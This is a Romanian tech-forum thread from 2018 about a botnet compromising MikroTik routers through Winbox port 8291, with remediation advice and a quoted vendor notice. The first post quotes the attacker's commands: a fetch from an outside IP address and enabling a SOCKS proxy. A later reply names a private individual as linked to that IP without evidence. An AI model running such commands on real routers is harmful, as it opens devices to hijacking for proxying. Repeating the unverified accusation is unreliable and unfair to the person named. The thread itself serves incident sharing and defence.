Jump to content

SUBIECTE NOI
« 1 / 5 »
RSS
teava rezistenta panou apa calda

Sub mobila de bucatarie si sub fr...

Rezultat RMN

Numar circuite IPAT si prindere t...
 Pareri brgimportchina.ro - teapa ...

Lucruri inaintea vremurilor lor

Discuții despre TVR Sport HD

Cost abonament clinica privata
 Tremura toata, dar nu de la ro...

Renault Android

Recomandare bicicleta e-bike 20&#...

Bing-Content removal tool
 Nu pot accesa monitorulsv.ro de l...

Cum sa elimini urmele de acnee?

Wc Geberit

Routere detinute in trecut si in ...
 

Mikrotik Alerta: Vulnerabilitatea portului Winbox (8291)!

- - - - -
  • Please log in to reply
12 replies to this topic

#1
SpargatorulDeVise

SpargatorulDeVise

    Member

  • Grup: Members
  • Posts: 441
  • Înscris: 03.07.2009
A inceput de vreo doua zile..  A vazut cineva asta?

Cineva, (un bot) se conectează si face următoarele:

/tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http
/ip socks> print
enabled: yes
port: 4145
connection-idle-timeout: 2m
max-connections: 200


fisierul mikrotik.php este gol

WinBox > IP> Socks > disable
WinBox > System >Scripts si stergeti "script1_"


Upradati de urgenta RouterOS la versiunea curenta v6.42.6!

Schimbati parola de admin si reboot

WinBox > System > Routerboard > Upgrade

[ https://i.imgur.com/VpJyXhz.png - Pentru incarcare in pagina (embed) Click aici ]

Edited by SpargatorulDeVise, 22 July 2018 - 13:23.


#2
gumball3000

gumball3000

    ...

  • Grup: Senior Members
  • Posts: 49,649
  • Înscris: 24.09.2006
as schimba, da' n-am mikrotik, rulez dd-wrt

anyway, care-i ala de are activ web management pe router?

p.s. ai uitat sa pui sursa

#3
SpargatorulDeVise

SpargatorulDeVise

    Member

  • Grup: Members
  • Posts: 441
  • Înscris: 03.07.2009

 gumball3000, on 22 iulie 2018 - 13:26, said:

as schimba, da' n-am mikrotik, rulez dd-wrt

anyway, care-i ala de are activ web management pe router?

p.s. ai uitat sa pui sursa

In aprilie a aparut exploit pentru interfata web a echipamentelor mikrotik.
Acum a aparut exploit pentru portul WinBox 8291

De ieri dimineata botnetul a inceput sa scaneze si sa escaladeze privilegii in retelele Telekom Romania si apoi RCS & RDS.

Am un amic cu doua echipamente afectate de exploit.

Singurele informatii despre victime le-am gasit pe : vk .com/mikrotik_os?w=wall-26469243_149490

#4
unbrutus

unbrutus

    Guru Member

  • Grup: Senior Members
  • Posts: 16,299
  • Înscris: 23.02.2017
Ceva anunt pe mikrotik.ro?

#5
SpargatorulDeVise

SpargatorulDeVise

    Member

  • Grup: Members
  • Posts: 441
  • Înscris: 03.07.2009

 unbrutus, on 22 iulie 2018 - 15:26, said:

Ceva anunt pe mikrotik.ro?
Este anunt despre vulnerabilitate pe blog la ei.
Ciudat este ca la data de 23.04.2018 au postat despre vulnerabilitatea webui si acum au modificat continutul anuntului dar nu si data.
In fine..

Au trimis si e-mail la membri in perioada aia cu urmatorul continut:
" Conform informatiilor primite recent de la Mikrotik.com,
un botnet periculos scaneaza in prezent adresele IP publice pentru a gasi porturi WinBox (8291) și WWW (80) deschise,
si poate exploata o vulnerabilitate a serverului web www de pe RouterOS astfel compromitand sistemul.
Acesta vulnerabilitate a fost patch-uita in urma cu un an de zile, in versiunea RouterOS v6.38.5( martie 2017).
Daca routerul dv. este direct expus pe Internet (are IP public, este accesibil de pe Internet)
este indicat sa upgradati de urgenta la ultima versiune curenta RouterOS v6.41.3 din Quickset / "Check for updates".
Mai multe informatii gasiti pe forumul oficial Mikrotik:
https://forum.mikrotik.com/viewtopic.php?f=21&t=132499

Indicatii pentru securizarea routerului:
sa aveti o parola (complexa) pe userul admin
sa activati optiunea Firewall, introdusa in Quickset dupa RouterOS v6.40, acest lucru impiedica accesarea routerului dv. din WAN(Internet)
daca pentru configurare folositi winbox,
serverul web www putand fi dezactivat din meniul /IP Services sau schimbat portul implicit 80 pe de ex. 8888
https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router "


Edited by SpargatorulDeVise, 22 July 2018 - 16:08.


#6
ndor

ndor

    Senior Member

  • Grup: Senior Members
  • Posts: 4,314
  • Înscris: 21.04.2005

 unbrutus, on 22 iulie 2018 - 15:26, said:

Ceva anunt pe mikrotik.ro?
Mikrotik.ro este doar un magazin online .
Mikrotik nu are site oficial in romana .
https://forum.mikrot...p?f=21&t=133533
Discutia asta a inceput in Aprilie . Cred ca ai ramas cu el de atunci .

#7
Tehnicianul1970

Tehnicianul1970

    Senior Member

  • Grup: Senior Members
  • Posts: 2,509
  • Înscris: 09.11.2014
Nu este nimic,stirea este veche iar routerele Mikrotik n-au nici pe naiba!
Eu am versiunea asta: RouterOS v6.40.4 (stable) pe un MikroTik RB962UiGS-5HacT2HnT si n-o schimb sub nicio forma! Este sistem de operare nu simplu firmware ca la TP-LIN(gi)K sau Tenda! Am firewall-ul activat si reguli pe el.
Pentru cei ce aveti MiktoTik - nu este nimic acum DPDV al amenintarilor informatice! Pentru siguranta DVS,schimbati-va periodic parola de admin si la regulile de firewall mai dati cate "o raita"! Prietenii stiu ce zic!


#8
Alice

Alice

    Big Boobs

  • Grup: Senior Members
  • Posts: 7,132
  • Înscris: 05.12.2002
Sunt vulnerabile versiunile pana la 6.43rc3 (inclusiv): https://forum.mikrot...ic.php?t=133533
Daca tu crezi ca e OK sa ramai cu 6.40.4, treaba ta.

#9
Tehnicianul1970

Tehnicianul1970

    Senior Member

  • Grup: Senior Members
  • Posts: 2,509
  • Înscris: 09.11.2014

 Alice, on 22 iulie 2018 - 23:08, said:

Sunt vulnerabile versiunile pana la 6.43rc3 (inclusiv): https://forum.mikrot...ic.php?t=133533
Daca tu crezi ca e OK sa ramai cu 6.40.4, treaba ta.
Da,este OK... foarte OK.Pentru o retea casnica pe UPC si reguli de firewall care stiu bine sa le aleg... este ultra - mega - giga - tera OK.
Si daca intra la mine pe retea... ca sa-mi ia? Boii de la bicicleta? Sutele de mii de melodii... ca la asta sunt maniac... sa le ia pe toate! Am back-up la absolut tot pe HDD-uri externe neconectate in vreo retea si puse bine la pastrare.Refac tot de la zero fara probleme.
Asa ca... hack-eri... face-ti-va de cap daca puteti intra la mine in reteaua casnica - pofiti va rog!

#10
bonti

bonti

    Member

  • Grup: Members
  • Posts: 582
  • Înscris: 06.12.2006
Confirm. Vazut in log doua conexiuni ratate via WinBox, a treia oara conectat ca admin, a modificat socks-ul , a instalat scriptul si a pornit scheduler-ul. Aveam 6.39.3 si o parola simpla. Schimbat parola. Adresa 95.154.216.160 e a unui domeniu din anglia, ceva firma, un tip ionut mandoca, romanas
Preventiv am lasat Winbox-ul doar din lan...

Attached Files


Edited by bonti, 23 July 2018 - 23:41.


#11
diZy

diZy

    Senior Member

  • Grup: Senior Members
  • Posts: 6,603
  • Înscris: 12.06.2006
Si update de ce nu faci?

#12
bonti

bonti

    Member

  • Grup: Members
  • Posts: 582
  • Înscris: 06.12.2006
Facut la 6.40.8 bugfix. Ciudat cum penetreaza parola din 2 incercari...Probabil ar trebui schimbat si user-ul "admin" in ceva personalizat...Recomandari normis-mikrotik : https://wiki.mikroti...ing_Your_Router

#13
bonti

bonti

    Member

  • Grup: Members
  • Posts: 582
  • Înscris: 06.12.2006
Atacurile continua...noroc ca winboxul e permis doar in lan, sau update-ul de firmware, cine mai stie...

Attached Files



Anunturi

Chirurgia endoscopică a hipofizei Chirurgia endoscopică a hipofizei

"Standardul de aur" în chirurgia hipofizară îl reprezintă endoscopia transnazală transsfenoidală.

Echipa NeuroHope este antrenată în unul din cele mai mari centre de chirurgie a hipofizei din Europa, Spitalul Foch din Paris, centrul în care a fost introdus pentru prima dată endoscopul în chirurgia transnazală a hipofizei, de către neurochirurgul francez Guiot. Pe lângă tumorile cu origine hipofizară, prin tehnicile endoscopice transnazale pot fi abordate numeroase alte patologii neurochirurgicale.

www.neurohope.ro

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Forumul Softpedia foloseste "cookies" pentru a imbunatati experienta utilizatorilor Accept
Pentru detalii si optiuni legate de cookies si datele personale, consultati Politica de utilizare cookies si Politica de confidentialitate